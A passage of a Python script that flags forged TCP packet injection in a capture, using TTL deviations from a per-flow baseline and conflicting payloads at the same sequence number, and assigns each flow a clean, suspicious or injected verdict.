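    capture. Without a SYN-ACK, fall back to the most common TTL in the flow.
    """
    for p in packets:
        if p.flags == "SA":
            return p.ttl
    return Counter(p.ttl for p in packets).most_common(1)[0][0]


def analyse_flow(packets, tolerance=1):
    """Return the evidence for one flow and a verdict derived from it."""
    base = baseline_ttl(packets)
    # A route change can move the TTL by a hop, so small drift is tolerated.
    outliers = [p for p in packets if abs(p.ttl - base) > tolerance]
    # A forged reply racing the genuine one shows up as two different payloads
    # starting at the same sequence number. Only exact matches on the start
    # are checked here; partial overlaps would need stream reassembly.
    bodies = defaultdict(set)
    for p in packets:
        if p.payload:
            bodies[p.seq].add(p.payload)
    conflicts = sorted(seq for seq, seen in bodies.items() if len(seen) > 1)
    if outliers and conflicts:
        verdict = "injected"      # both independent signals agree
    elif outliers or conflicts:
        verdict = "suspicious"    # one signal only, needs a closer look
    else:
        verdict = "clean"
    return {"baseline_ttl": base, "ttl_outliers": outliers,
            "conflicting_seqs": conflicts, "verdict": verdict}


def analyse_capture(packets, tolerance=1):
    """Group packets by flow and analyse each flow separately."""
    flows = defaultdict(list)
    for p in packets:
        flows[p.flow].append(p)
    return {flow: analyse_flow(pkts, tolerance) for flow, pkts in flows.items()}


if __name__ == "__main__":
    for flow, result in sorted(analyse_capture(PACKETS).items()):
        ttls = [p.ttl for p in result["ttl_outliers"]]
        print(flow, result["verdict"], "baseline", result["baseline_ttl"],
              "outlier TTLs", ttls, "conflicting seqs", result["conflicting_seqs"])
```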